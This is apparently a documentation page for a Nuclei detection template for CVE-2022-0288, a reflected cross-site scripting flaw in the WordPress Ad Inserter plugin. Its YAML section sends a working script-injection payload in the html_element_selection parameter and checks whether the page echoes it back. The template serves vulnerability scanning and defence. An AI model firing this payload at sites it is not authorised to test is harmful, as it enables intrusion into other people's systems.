WordPress Ad Inserter <2.7.10 - Cross-Site Scripting
ID: CVE-2022-0288
Severity: medium
Author: DhiyaneshDK
Tags: cve,cve2022,wordpress,xss,wpscan,ad_inserter_pro_project
Description
Section titled “Description”WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page.
YAML Source
Section titled “YAML Source”id: CVE-2022-0288
info: name: WordPress Ad Inserter <2.7.10 - Cross-Site Scripting author: DhiyaneshDK severity: medium description: | WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page. impact: | Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing attackers to execute malicious scripts in the context of the victim's browser. remediation: Fixed in version 2.7.12 reference: - https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42 - https://nvd.nist.gov/vuln/detail/CVE-2022-0288 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0288 cwe-id: CWE-79 epss-score: 0.00106 epss-percentile: 0.43227 cpe: cpe:2.3:a:ad_inserter_pro_project:ad_inserter_pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: ad_inserter_pro_project product: ad_inserter_pro framework: wordpress tags: cve,cve2022,wordpress,xss,wpscan,ad_inserter_pro_project
http: - method: POST path: - "{{BaseURL}}"
body: | html_element_selection=</script><img+src+onerror=alert(document.domain)>
headers: Content-Type: "application/x-www-form-urlencoded"
matchers-condition: and matchers: - type: word part: body words: - "</script><img src onerror=alert(document.domain)>" - "ad-inserter" condition: and
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 4a0a0047304502202238f3b417e7c63a5167d6042852e41e1016724ebd336218f490ccd6d4f75f59022100c6eaf87f4e9eba1f1d8d8fccd36f7b8d305123ae71e00cd1d94350d343779a94:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0288.yaml"